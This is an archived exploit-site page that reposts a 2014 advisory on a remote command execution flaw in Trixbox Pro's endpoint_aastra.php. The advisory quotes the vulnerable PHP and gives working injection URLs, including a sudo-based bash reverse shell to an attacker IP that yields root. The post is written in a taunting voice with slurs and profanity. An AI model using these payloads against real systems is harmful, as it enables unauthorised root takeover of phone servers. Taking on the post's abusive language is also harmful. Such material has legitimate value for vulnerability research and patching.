exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Trixbox Pro Remote Command Execution

Trixbox Pro Remote Command Execution
Posted Mar 14, 2014
Authored by i-Hmx

Trixbox Pro suffers from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | 16c4989fd587dda06942b413211a881e0f52e9cf1be3fd56030a2eb7f44eab75

Trixbox Pro Remote Command Execution

Change Mirror Download
# App : Trixbox all versions
# vendor : trixbox.com
# Author : i-Hmx
# mail : n0p1337@gmail.com
# Home : security arrays inc , sec4ever.com ,exploit4arab.net

Well well well , we decided to give schmoozecom a break and have a look @
fonality products
do you think they have better product than the (Award winning) trixbox!!!
I don't think so
"Designed and marketed for Fonality's partner community, trixbox Pro is an
IP-PBX software solution purpose built to support growing SMB businesses.
A unique hybrid hosted telephony solution; trixbox Pro provides big
business features at an SMB cost . . blah blah blah"
What do we have here??
A 3 years old Sql injection flaw???
not big deal , and already been reported
not enough good exploitation , but reported
A file disclosure flaw???
save it for later
let's give Fonality little Remote root Exploit xD
and also give the "Predictors" some pain in the ass trying to exploit this
consider it as challenge ;)
Here we go
Vulnerable file :
/var/www/html/maint/modules/endpointcfg/endpoint_aastra.php
Pice of shit , sorry i mean code

switch($_action) {
case 'Edit':
if ($_REQUEST['newmac']){ // create a new phone from device map
$mac_address = $_REQUEST['newmac'];
}
if ($_REQUEST['mac']){
$phoneinfo = GetPhone($_REQUEST['mac'],$PhoneType);
$mac_address=$phoneinfo['mac_address']; } // if there is a
request ID we Edit otherwise add a new phone

$freepbx_device_list = GetFreepbxDeviceList();
$smarty->assign("mac_address", $mac_address);
$smarty->assign("phone", $phoneinfo);
$smarty->assign("freepbx_device_list", $freepbx_device_list);

$smarty->assign("message", $message);
$template = "endpoint_".$PhoneType."_edit.tpl";
break;

case 'Delete':
exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");
getSQL("DELETE FROM ".$PhoneType." WHERE
mac_address='".$_REQUEST['mac']."'",'endpoints');
$smarty->assign("phones", ListPhones($PhoneType));
$template = "endpoint_".$PhoneType."_list.tpl";
break;

it's obvious we care about this line
>>>exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");<<<
Exploitation demo :
maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;echo
id>xx;faris
result will be written to xx
but this is not the full movie yet ,
Am here to give fonality an night mare , which take the form of "root"
privzz
actually the server is configured by default to allow the web interface
pages to edit many files @ the root directory
so any noob can easily execute the "sudo fuck" with out being permited for
password , and the result is > root
Demo
<Back connection with root privs>
maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;sudo
bash -i >%26 %2fdev%2ftcp%2fxxx.xxx.xxx.xxx%2f1337 0>%261;faris
change to your ip and the port you are listening to
and , Volia , you are root
now am sure you're happy as pig in shit xD
Still need more??
you will notice that you're unable to reach this file due to the http
firewall
but actually there is simple and yet dirty trick that allow you to get pass
through it , and execute your command smooooothely as boat on the river ;)
And here come the challenge , let's see what the faggots can do with this ;)
need hint???
use your mind and fuck off :/

Big greets fly to the all sec4ever family
oh , and for voip lames , you can use our 0Days for sure
but once it become 720Days xD
Regards,
Faris <the Awsome>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close